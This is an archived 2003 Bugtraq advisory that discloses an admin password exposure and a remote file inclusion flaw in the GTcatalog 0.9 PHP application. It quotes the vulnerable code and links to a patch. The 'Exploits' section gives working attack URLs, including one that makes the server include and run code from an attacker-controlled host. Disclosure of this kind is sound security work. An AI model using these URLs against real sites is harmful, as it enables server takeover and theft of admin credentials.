Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: GTcatalog (PHP)

GTcatalog (PHP)

From: Frog Man <leseulfrog_at_hotmail.com>
Date: Mon, 03 Mar 2003 15:52:29 +0100

Informations :
°°°°°°°°°°°°°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Informations Disclosure (Admin Password)
- File Including

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
password.inc :
<?
$globalpw = "[PASSWORD]";
?>

index.php :
------------------------------------------------------------------------
[...]
switch ($function)
{

case "custom":

$cc = new Template();
        $cc->set_file("head",$dir_base.$dir_template."header.inc");
        $cc->set_var(array( 'clientcode' => $cfg_clientcode,
                                                                'title' => $cfg_title." - ".$custom));
$cc->parse("output","head");
$cc->p("output");

include($custom.".custom.inc");
include ($dir_base.$dir_template."footer.inc");

break;
[...]
------------------------------------------------------------------------

Exploits :
°°°°°°°°°°
- http://[target]/password.inc
- http://[target]/index.php?function=custom&custom=http://[attacker]/1
with :
http://[attacker]/1.custom.inc

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))

More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/GTcatalog.txt

frog-m_at_n

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
Received on Mar 03 2003

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos